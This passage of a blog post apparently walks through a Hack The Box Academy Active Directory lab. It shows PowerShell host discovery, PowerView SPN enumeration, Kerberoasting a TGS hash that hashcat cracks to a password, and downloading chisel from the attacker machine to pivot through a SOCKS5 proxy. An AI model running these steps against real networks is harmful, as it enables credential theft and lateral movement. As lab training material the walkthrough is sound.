class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">240.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">172.16.6.100</span><span class="w"> </span><span class="nx">266</span><span class="w"> </span><span class="mf">224.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">240.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">10.129.25.22</span><span class="w"> </span><span class="nx">271</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">127.0.0.1</span><span class="w"> </span><span class="nx">331</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">172.16.6.100</span><span class="w"> </span><span class="nx">266</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="mf">255.255</span><span class="o">.</span><span class="nf">255</span><span class="o">.</span><span class="nf">255</span><span class="w"> </span><span class="n">On-link</span><span class="w"> </span><span class="nx">10.129.25.22</span><span class="w"> </span><span class="nx">271</span><span class="w"> </span><span class="o">===========================================================================</span><span class="w"> </span><span class="n">Persistent</span><span class="w"> </span><span class="nx">Routes:</span><span class="w"> </span><span class="n">Network</span><span class="w"> </span><span class="nx">Address</span><span class="w"> </span><span class="nx">Netmask</span><span class="w"> </span><span class="nx">Gateway</span><span class="w"> </span><span class="nx">Address</span><span class="w"> </span><span class="nx">Metric</span><span class="w"> </span><span class="mf">0.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">0.0</span><span class="o">.</span><span class="nf">0</span><span class="o">.</span><span class="nf">0</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">6</span><span class="o">.</span><span class="nf">1</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">===========================================================================</span><span class="w"> </span><span class="n">IPv6</span><span class="w"> </span><span class="nx">Route</span><span class="w"> </span><span class="nx">Table</span><span class="w"> </span><span class="o">===========================================================================</span><span class="w"> </span><span class="n">Active</span><span class="w"> </span><span class="nx">Routes:</span><span class="w"> </span><span class="kr">If</span><span class="w"> </span><span class="n">Metric</span><span class="w"> </span><span class="nx">Network</span><span class="w"> </span><span class="nx">Destination</span><span class="w"> </span><span class="nx">Gateway</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="mi">271</span><span class="w"> </span><span class="p">::</span><span class="n">/0</span><span class="w"> </span><span class="nx">fe80::250:56ff:fe94:a0a0</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="mi">331</span><span class="w"> </span><span class="p">::</span><span class="mi">1</span><span class="n">/128</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="mi">271</span><span class="w"> </span><span class="n">dead:beef::/64</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="mi">271</span><span class="w"> </span><span class="n">dead:beef::202/128</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="mi">271</span><span class="w"> </span><span class="n">dead:beef::15a2:99e7:f7e2:6c05/128</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">7</span><span class="w"> </span><span class="mi">266</span><span class="w"> </span><span class="n">fe80::/64</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="mi">271</span><span class="w"> </span><span class="n">fe80::/64</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="mi">271</span><span class="w"> </span><span class="n">fe80::15a2:99e7:f7e2:6c05/128</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">7</span><span class="w"> </span><span class="mi">266</span><span class="w"> </span><span class="n">fe80::5425:f5d2:6282:3a53/128</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="mi">331</span><span class="w"> </span><span class="n">ff00::/8</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">7</span><span class="w"> </span><span class="mi">266</span><span class="w"> </span><span class="n">ff00::/8</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="mi">3</span><span class="w"> </span><span class="mi">271</span><span class="w"> </span><span class="n">ff00::/8</span><span class="w"> </span><span class="nx">On-link</span><span class="w"> </span><span class="o">===========================================================================</span><span class="w"> </span><span class="n">Persistent</span><span class="w"> </span><span class="nx">Routes:</span><span class="w"> </span><span class="n">None</span><span class="w"> </span></code></pre> </div> <p>With the above scan we confirm that this box is <code>dual-homed (connected to two networks)</code></p> <p>Two different networks exist:</p> <ol> <li>172.16.6.0/16 → internal domain network (Guessing where DC is)</li> <li>10.129.0.0/16 → external network</li> </ol> <p>I tried to download fping but no luck, so I try to check the live hosts within the domain network with the code below.Though it was slow but I got back result:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>6..7 | ForEach-Object <span class="o">{</span> <span class="nv">$i</span> <span class="o">=</span> <span class="nv">$_</span><span class="p">;</span> 1..254 | ForEach-Object <span class="o">{</span> <span class="k">if</span> <span class="o">(</span>Test-Connection <span class="nt">-ComputerName</span> <span class="s2">"172.16.</span><span class="nv">$i</span><span class="s2">.</span><span class="nv">$_</span><span class="s2">"</span> <span class="nt">-Count</span> 1 <span class="nt">-Quiet</span><span class="o">)</span> <span class="o">{</span> write-host <span class="s2">"172.16.</span><span class="nv">$i</span><span class="s2">.</span><span class="nv">$_</span><span class="s2"> is UP"</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span> </code></pre> </div> <p>We got back three ips back including our host ip below:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">6..7</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nv">$i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="bp">$_</span><span class="p">;</span><span class="w"> </span><span class="mi">1</span><span class="o">..</span><span class="mi">254</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">ForEach-Object</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="kr">if</span><span class="w"> </span><span class="p">(</span><span class="n">Test-Connection</span><span class="w"> </span><span class="nt">-ComputerName</span><span class="w"> </span><span class="s2">"172.16.</span><span class="nv">$i</span><span class="s2">.</span><span class="bp">$_</span><span class="s2">"</span><span class="w"> </span><span class="nt">-Count</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="nt">-Quiet</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">write-host</span><span class="w"> </span><span class="s2">"172.16.</span><span class="nv">$i</span><span class="s2">.</span><span class="bp">$_</span><span class="s2"> is UP"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">6</span><span class="o">.</span><span class="nf">3</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="nx">UP</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">6</span><span class="o">.</span><span class="nf">50</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="nx">UP</span><span class="w"> </span><span class="mf">172.16</span><span class="o">.</span><span class="nf">6</span><span class="o">.</span><span class="nf">100</span><span class="w"> </span><span class="n">is</span><span class="w"> </span><span class="nx">UP</span><span class="w"> </span></code></pre> </div> <p>Then Check the password policy with <code>net accounts /domain</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">net</span><span class="w"> </span><span class="nx">accounts</span><span class="w"> </span><span class="nx">/domain</span><span class="w"> </span><span class="n">net</span><span class="w"> </span><span class="nx">accounts</span><span class="w"> </span><span class="nx">/domain</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="nx">request</span><span class="w"> </span><span class="nx">will</span><span class="w"> </span><span class="nx">be</span><span class="w"> </span><span class="nx">processed</span><span class="w"> </span><span class="nx">at</span><span class="w"> </span><span class="nx">a</span><span class="w"> </span><span class="nx">domain</span><span class="w"> </span><span class="nx">controller</span><span class="w"> </span><span class="nx">for</span><span class="w"> </span><span class="nx">domain</span><span class="w"> </span><span class="nx">INLANEFREIGHT.LOCAL.</span><span class="w"> </span><span class="n">Force</span><span class="w"> </span><span class="nx">user</span><span class="w"> </span><span class="nx">logoff</span><span class="w"> </span><span class="nx">how</span><span class="w"> </span><span class="nx">long</span><span class="w"> </span><span class="nx">after</span><span class="w"> </span><span class="nx">time</span><span class="w"> </span><span class="nx">expires</span><span class="nf">?</span><span class="p">:</span><span class="w"> </span><span class="nx">Never</span><span class="w"> </span><span class="nx">Minimum</span><span class="w"> </span><span class="nx">password</span><span class="w"> </span><span class="nx">age</span><span class="w"> </span><span class="p">(</span><span class="n">days</span><span class="p">):</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="n">Maximum</span><span class="w"> </span><span class="nx">password</span><span class="w"> </span><span class="nx">age</span><span class="w"> </span><span class="p">(</span><span class="n">days</span><span class="p">):</span><span class="w"> </span><span class="nx">42</span><span class="w"> </span><span class="n">Minimum</span><span class="w"> </span><span class="nx">password</span><span class="w"> </span><span class="nx">length:</span><span class="w"> </span><span class="nx">1</span><span class="w"> </span><span class="n">Length</span><span class="w"> </span><span class="nx">of</span><span class="w"> </span><span class="nx">password</span><span class="w"> </span><span class="nx">history</span><span class="w"> </span><span class="nx">maintained:</span><span class="w"> </span><span class="nx">24</span><span class="w"> </span><span class="n">Lockout</span><span class="w"> </span><span class="nx">threshold:</span><span class="w"> </span><span class="nx">Never</span><span class="w"> </span><span class="n">Lockout</span><span class="w"> </span><span class="nx">duration</span><span class="w"> </span><span class="p">(</span><span class="n">minutes</span><span class="p">):</span><span class="w"> </span><span class="nx">30</span><span class="w"> </span><span class="n">Lockout</span><span class="w"> </span><span class="nx">observation</span><span class="w"> </span><span class="nx">window</span><span class="w"> </span><span class="p">(</span><span class="n">minutes</span><span class="p">):</span><span class="w"> </span><span class="nx">30</span><span class="w"> </span><span class="n">Computer</span><span class="w"> </span><span class="nx">role:</span><span class="w"> </span><span class="nx">PRIMARY</span><span class="w"> </span></code></pre> </div> <p>To step-up our enumeration let's Download and move Powerview to the target and Import-Module:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Import-Module</span><span class="w"> </span><span class="o">.</span><span class="nx">\PowerView.ps1</span><span class="w"> </span><span class="n">Import-Module</span><span class="w"> </span><span class="o">.</span><span class="nx">\PowerView.ps1</span><span class="w"> </span><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Get-Command</span><span class="w"> </span><span class="nx">Get-DomainUser</span><span class="w"> </span><span class="n">Get-Command</span><span class="w"> </span><span class="nx">Get-DomainUser</span><span class="w"> </span><span class="n">CommandType</span><span class="w"> </span><span class="nx">Name</span><span class="w"> </span><span class="nx">Version</span><span class="w"> </span><span class="nx">Source</span><span class="w"> </span><span class="o">-----------</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="o">-------</span><span class="w"> </span><span class="o">------</span><span class="w"> </span><span class="kr">Function</span><span class="w"> </span><span class="nf">Get-DomainUser</span><span class="w"> </span></code></pre> </div> <p>Then run Get-DomainUser * -spn | select samaccountname,serviceprincipalname to SPN accounts.</p> <p>Why do we need check for SPN accounts?</p> <h2> These accounts are: </h2> <ol> <li>service accounts</li> <li>tied to services (SQL, IIS, etc.)</li> <li>often have privileged access</li> <li>frequently have weak or reused passwords</li> <li>issued TGS (Ticket Granting Service) tickets </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Get-DomainUser</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nt">-spn</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">select</span><span class="w"> </span><span class="nx">samaccountname</span><span class="p">,</span><span class="nx">serviceprincipalname</span><span class="w"> </span><span class="n">Get-DomainUser</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nt">-spn</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">select</span><span class="w"> </span><span class="nx">samaccountname</span><span class="p">,</span><span class="nx">serviceprincipalname</span><span class="w"> </span><span class="n">samaccountname</span><span class="w"> </span><span class="nx">serviceprincipalname</span><span class="w"> </span><span class="o">--------------</span><span class="w"> </span><span class="o">--------------------</span><span class="w"> </span><span class="n">azureconnect</span><span class="w"> </span><span class="nx">adfsconnect/azure01.inlanefreight.local</span><span class="w"> </span><span class="n">backupjob</span><span class="w"> </span><span class="nx">backupjob/veam001.inlanefreight.local</span><span class="w"> </span><span class="n">krbtgt</span><span class="w"> </span><span class="nx">kadmin/changepw</span><span class="w"> </span><span class="n">sqltest</span><span class="w"> </span><span class="nx">MSSQLSvc/DEVTEST.inlanefreight.local:1433</span><span class="w"> </span><span class="n">sqlqa</span><span class="w"> </span><span class="nx">MSSQLSvc/QA001.inlanefreight.local:1433</span><span class="w"> </span><span class="n">sqldev</span><span class="w"> </span><span class="nx">MSSQLSvc/SQL-DEV01.inlanefreight.local:1433</span><span class="w"> </span><span class="n">svc_sql</span><span class="w"> </span><span class="nx">MSSQLSvc/SQL01.inlanefreight.local:1433</span><span class="w"> </span><span class="n">sqlprod</span><span class="w"> </span><span class="nx">MSSQLSvc/SQL02.inlanefreight.local:1433</span><span class="w"> </span></code></pre> </div> <p>We see that the samaccountname for the SPN in question (MSSQLSvc/SQL01.inlanefreight.local:1433) is svc_sql.</p> <p>Now we can get the TGS ticket in Hashcat format.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Get-DomainUser</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nt">-spn</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">select</span><span class="w"> </span><span class="nx">samaccountname</span><span class="p">,</span><span class="nx">serviceprincipalname</span><span class="w"> </span><span class="n">Get-DomainUser</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nt">-spn</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">select</span><span class="w"> </span><span class="nx">samaccountname</span><span class="p">,</span><span class="nx">serviceprincipalname</span><span class="w"> </span><span class="n">samaccountname</span><span class="w"> </span><span class="nx">serviceprincipalname</span><span class="w"> </span><span class="o">--------------</span><span class="w"> </span><span class="o">--------------------</span><span class="w"> </span><span class="n">azureconnect</span><span class="w"> </span><span class="nx">adfsconnect/azure01.inlanefreight.local</span><span class="w"> </span><span class="n">backupjob</span><span class="w"> </span><span class="nx">backupjob/veam001.inlanefreight.local</span><span class="w"> </span><span class="n">krbtgt</span><span class="w"> </span><span class="nx">kadmin/changepw</span><span class="w"> </span><span class="n">sqltest</span><span class="w"> </span><span class="nx">MSSQLSvc/DEVTEST.inlanefreight.local:1433</span><span class="w"> </span><span class="n">sqlqa</span><span class="w"> </span><span class="nx">MSSQLSvc/QA001.inlanefreight.local:1433</span><span class="w"> </span><span class="n">sqldev</span><span class="w"> </span><span class="nx">MSSQLSvc/SQL-DEV01.inlanefreight.local:1433</span><span class="w"> </span><span class="n">svc_sql</span><span class="w"> </span><span class="nx">MSSQLSvc/SQL01.inlanefreight.local:1433</span><span class="w"> </span><span class="n">sqlprod</span><span class="w"> </span><span class="nx">MSSQLSvc/SQL02.inlanefreight.local:1433</span><span class="w"> </span><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Get-DomainUser</span><span class="w"> </span><span class="nt">-Identity</span><span class="w"> </span><span class="nx">svc_sql</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Get-DomainSPNTicket</span><span class="w"> </span><span class="nt">-Format</span><span class="w"> </span><span class="nx">Hashcat</span><span class="w"> </span><span class="n">Get-DomainUser</span><span class="w"> </span><span class="nt">-Identity</span><span class="w"> </span><span class="nx">svc_sql</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Get-DomainSPNTicket</span><span class="w"> </span><span class="nt">-Format</span><span class="w"> </span><span class="nx">Hashcat</span><span class="w"> </span><span class="n">SamAccountName</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">svc_sql</span><span class="w"> </span><span class="n">DistinguishedName</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">CN</span><span class="o">=</span><span class="n">svc_sql</span><span class="p">,</span><span class="nx">CN</span><span class="o">=</span><span class="n">Users</span><span class="p">,</span><span class="nx">DC</span><span class="o">=</span><span class="n">INLANEFREIGHT</span><span class="p">,</span><span class="nx">DC</span><span class="o">=</span><span class="n">LOCAL</span><span class="w"> </span><span class="nx">ServicePrincipalName</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">MSSQLSvc/SQL01.inlanefreight.local:1433</span><span class="w"> </span><span class="n">TicketByteHexStream</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">Hash</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nv">$krb5tgs$23</span><span class="err">$</span><span class="o">*</span><span class="nx">svc_sql</span><span class="nv">$INLANEFREIGHT</span><span class="o">.</span><span class="nf">LOCAL</span><span class="nv">$MSSQLSvc</span><span class="nx">/SQL01.inlanefreight.local:1433</span><span class="o">*</span><span class="nv">$033E72A1673FBECEC2BA32C7311A3407$DBAC70A37D122F20632D9777F49FF1CB87DC3A376E2D61BAE1BF93FAD4E41861A038816559BC11F7F086DDADC3AC8D13073F830621EE5431BD48991721A1B9C018A369EAAACACE5AE53DCC419F58C2DB509D1B28A4D52</span><span class="o">=</span><span class="mi">44891900</span><span class="n">AF2D4743CAEA09F79161086BCE3F4399C5995F78163240BFBE6835609E71B74E52AD2A4BC30FBB838A25665AD2BE3B6C9DCBF8A9388C149308D212CB2742F95010E0ADBCC63B5E43A8444D9350BC21D0CCEA2A27DA58461A8F1CD2F00538774511EBBE6319ADAC6CBDFD476ACCA57983A5825BEBA52CD389E149403A500F9E294FEF1182EE08AF444ACCA0A1C14374908D6D84314A823E8CD7AC4449B6A8A2C93E2AA4892978A2692C0B37C697E42CD3F55BF8BD3A395C2F416CA16E</span><span class="w"> </span><span class="nx">93B4FF7DE4476C2BD7FFC191B4DC79A0B11586E9FD9B379733E5698317EA6EE0FE4DF2B9B26CBF3B30204F7B5F2487314235F93BCA85CB2B7C94B07F1CBEB54DD27FB8A73E44BBB039C28E3C79B61104EBB3BBCABBD00F1B222A08BEA24AFDF890CBCC5B142F630BFD2843030B67F623E389326C9B8E9EBF89AF7B42275D235BD245400F661704368970108B4100A86A7F545762B7E096302A03E3C16640A014189DB39602954E467B2DAA78423C166FC2375DCE11A0228AA111B9A5B510D33D84FD1E5EA39D18184CC0077596DDC7EF3FDF72DB0639796CA5019ECE30F92CB0FC130E5F4246F4ADA8D7914656AFAF229B5D885969D3E07C65F4561784416E9C012D3947DD6E78211EE247BC2DF3133AA3342E7CD0B09822984FBEA866D74D581CFAE2DE1B92830F4E5718A7CA2018FF0C70FBDA20D76393C52F0A15D26D32B2AEE1C3670B978DB0C57C256D3CDBB2BC0A38AC166A53E7E12030F6A39166472F91C20514E5D742267CB23CDCD9C4D709F41768C9082C09D9504DDA8074702DC042B4396F51224BABA0434383F9C8C98AF37C043B240608E8AFAA574CB08F70CE06CBF55115214BDFEF22692E4FBDC1BD7485F150C74152C0EA274EAF53BFB935C8DA5B2B4A1539331E7D4BFDB184257CFD4917DCCC651C349098AFF8DA1DA4C818F29797BB696C674683802FC914508FA879887D47EAE46C2D836F7472B9AC834BB2CAF1859E22705F2ED98CB127AB830F00473B0C0B2A108DC6400FC5E77D597FDBE1462030889DC498223B6A072588805D3CDB8600324EBC2EBCBCD35BFC020D4877316BF8EB9F11582CBA46C16436E14F813A4A5AE3EE0BB16BD07A73FF1B0BC135E95BF6A8FD9B5EFA9DAED725B5DD91F51E6330FDD76BB56116D34DB197D59061D19B21C485F962CD4DBE203C23A2A9203F34ED5C8FA32068061AE528DA2D144D362B501AE5F1CAB79FF516981970DC6FB31E80401A2B7B564E332B76FA564F8BD446C4984D1DD291397FAEC2EF7176399C01EB805FC57C228C42BF23AB6B9C5C8932FC09027A8DF5D8CB646CFBBF2D416D3FF73A04142240352B771E2BFEB150B3190572D570D46F9D1448BE760BC86D607CBE2519EB816A8E0D0E148C249</span><span class="w"> </span></code></pre> </div> <p>Let try to crack it with hashcat:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>─[eu-academy-1]─[10.10.14.78]─[htb-ac-2510340@htb-hdniwpyvod]─[~] └──╼ <span class="o">[</span>★]<span class="nv">$ </span>hashcat <span class="nt">-m</span> 13100 svc_sql /usr/share/wordlists/rockyou.txt hashcat <span class="o">(</span>v6.2.6<span class="o">)</span> starting Dictionary cache built: <span class="k">*</span> Filename..: /usr/share/wordlists/rockyou.txt <span class="k">*</span> Passwords.: 14344392 <span class="k">*</span> Bytes.....: 139921507 <span class="k">*</span> Keyspace..: 14344385 <span class="k">*</span> Runtime...: 1 sec <span class="nv">$krb5tgs$23$*</span>svc_sql<span class="nv">$INLANEFREIGHT</span>.LOCAL<span class="nv">$MSSQLSvc</span>/SQL01.inlanefreight.local:1433<span class="k">*</span><span class="nv">$033e72a1673fbecec2ba32c7311a3407$dbac70a37d122f20632d9777f49ff1cb87dc3a376e2d61bae1bf93fad4e41861a038816559bc11f7f086ddadc3ac8d13073f830621ee5431bd48991721a1b9c018a369eaaacace5ae53dcc419f58c2db509d1b28a4d5244891900af2d4743caea09f79161086bce3f4399c5995f78163240bfbe6835609e71b74e52ad2a4bc30fbb838a25665ad2be3b6c9dcbf8a9388c149308d212cb2742f95010e0adbcc63b5e43a8444d9350bc21d0ccea2a27da58461a8f1cd2f00538774511ebbe6319adac6cbdfd476acca57983a5825beba52cd389e149403a500f9e294fef1182ee08af444acca0a1c14374908d6d84314a823e8cd7ac4449b6a8a2c93e2aa4892978a2692c0b37c697e42cd3f55bf8bd3a395c2f416ca16e93b4ff7de4476c2bd7ffc191b4dc79a0b11586e9fd9b379733e5698317ea6ee0fe4df2b9b26cbf3b30204f7b5f2487314235f93bca85cb2b7c94b07f1cbeb54dd27fb8a73e44bbb039c28e3c79b61104ebb3bbcabbd00f1b222a08bea24afdf890cbcc5b142f630bfd2843030b67f623e389326c9b8e9ebf89af7b42275d235bd245400f661704368970108b4100a86a7f545762b7e096302a03e3c16640a014189db39602954e467b2daa78423c166fc2375dce11a0228aa111b9a5b510d33d84fd1e5ea39d18184cc0077596ddc7ef3fdf72db0639796ca5019ece30f92cb0fc130e5f4246f4ada8d7914656afaf229b5d885969d3e07c65f4561784416e9c012d3947dd6e78211ee247bc2df3133aa3342e7cd0b09822984fbea866d74d581cfae2de1b92830f4e5718a7ca2018ff0c70fbda20d76393c52f0a15d26d32b2aee1c3670b978db0c57c256d3cdbb2bc0a38ac166a53e7e12030f6a39166472f91c20514e5d742267cb23cdcd9c4d709f41768c9082c09d9504dda8074702dc042b4396f51224baba0434383f9c8c98af37c043b240608e8afaa574cb08f70ce06cbf55115214bdfef22692e4fbdc1bd7485f150c74152c0ea274eaf53bfb935c8da5b2b4a1539331e7d4bfdb184257cfd4917dccc651c349098aff8da1da4c818f29797bb696c674683802fc914508fa879887d47eae46c2d836f7472b9ac834bb2caf1859e22705f2ed98cb127ab830f00473b0c0b2a108dc6400fc5e77d597fdbe1462030889dc498223b6a072588805d3cdb8600324ebc2ebcbcd35bfc020d4877316bf8eb9f11582cba46c16436e14f813a4a5ae3ee0bb16bd07a73ff1b0bc135e95bf6a8fd9b5efa9daed725b5dd91f51e6330fdd76bb56116d34db197d59061d19b21c485f962cd4dbe203c23a2a9203f34ed5c8fa32068061ae528da2d144d362b501ae5f1cab79ff516981970dc6fb31e80401a2b7b564e332b76fa564f8bd446c4984d1dd291397faec2ef7176399c01eb805fc57c228c42bf23ab6b9c5c8932fc09027a8df5d8cb646cfbbf2d416d3ff73a04142240352b771e2bfeb150b3190572d570d46f9d1448be760bc86d607cbe2519eb816a8e0d0e148c249</span>:lucky7 Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 <span class="o">(</span>Kerberos 5, etype 23, TGS-REP<span class="o">)</span> Hash.Target......: <span class="nv">$krb5tgs$23$*</span>svc_sql<span class="nv">$INLANEFREIGHT</span>.LOCAL<span class="nv">$MSSQLSvc</span>/S...48c249 Time.Started.....: Wed Apr 29 10:27:05 2026 <span class="o">(</span>0 secs<span class="o">)</span> Time.Estimated...: Wed Apr 29 10:27:05 2026 <span class="o">(</span>0 secs<span class="o">)</span> Kernel.Feature...: Pure Kernel Guess.Base.......: File <span class="o">(</span>/usr/share/wordlists/rockyou.txt<span class="o">)</span> Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Speed.#2.........: 691.4 kH/s <span class="o">(</span>2.03ms<span class="o">)</span> @ Accel:512 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests <span class="o">(</span>total<span class="o">)</span>, 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests <span class="o">(</span>new<span class="o">)</span> Progress.........: 2048/14344385 <span class="o">(</span>0.01%<span class="o">)</span> Rejected.........: 0/2048 <span class="o">(</span>0.00%<span class="o">)</span> Restore.Point....: 0/14344385 <span class="o">(</span>0.00%<span class="o">)</span> Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#2....: 123456 -&gt; lovers1 Started: Wed Apr 29 10:26:56 2026 Stopped: Wed Apr 29 10:27:06 2026 </code></pre> </div> <p>The next question is <code>Submit the contents of the flag.txt file on the Administrator desktop on MS01</code> so I ran the command below to confirm the MS01 ip address:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Resolve-DnsName</span><span class="w"> </span><span class="nx">MS01</span><span class="w"> </span><span class="n">Resolve-DnsName</span><span class="w"> </span><span class="nx">MS01</span><span class="w"> </span><span class="n">Name</span><span class="w"> </span><span class="nx">Type</span><span class="w"> </span><span class="nx">TTL</span><span class="w"> </span><span class="nx">Section</span><span class="w"> </span><span class="nx">IPAddress</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="o">----</span><span class="w"> </span><span class="o">---</span><span class="w"> </span><span class="o">-------</span><span class="w"> </span><span class="o">---------</span><span class="w"> </span><span class="n">MS01.INLANEFREIGHT.LOCAL</span><span class="w"> </span><span class="nx">A</span><span class="w"> </span><span class="nx">1200</span><span class="w"> </span><span class="nx">Answer</span><span class="w"> </span><span class="nx">172.16.6.50</span><span class="w"> </span></code></pre> </div> <p>We are unable to connect directly to the MS01 from our attack box, that means we need to set up proxy server, so I chose chisel</p> <p>I downloaded chisel, start python3 server on my attack machine and uploaded chisel to the target machine:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">Invoke-WebRequest</span><span class="w"> </span><span class="nx">http://10.10.14.30:8080/chisel_windows.exe</span><span class="w"> </span><span class="nt">-OutFile</span><span class="w"> </span><span class="nx">C:\chisel_windows.exe</span><span class="w"> </span></code></pre> </div> <p>Then we need to start chisel as server on the target:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">PS</span><span class="w"> </span><span class="nx">C:\</span><span class="err">&gt;</span><span class="w"> </span><span class="o">.</span><span class="nx">/chisel_windows.exe</span><span class="w"> </span><span class="nx">server</span><span class="w"> </span><span class="nt">-p</span><span class="w"> </span><span class="nx">1234</span><span class="w"> </span><span class="nt">--socks5</span><span class="w"> </span><span class="o">.</span><span class="n">/chisel_windows.exe</span><span class="w"> </span><span class="nx">server</span><span class="w"> </span><span class="nt">-p</span><span class="w"> </span><span class="nx">1234</span><span class="w"> </span><span class="nt">--socks5</span><span class="w"> </span><span class="mi">2026</span><span class="n">/05/01</span><span class="w"> </span><span class="nx">07:23:52</span><span class="w"> </span><span class="nx">server:</span><span class="w"> </span><span class="nx">Fingerprint</span><span class="w"> </span><span class="nx">WtNKsr</span><span class="o">+</span><span 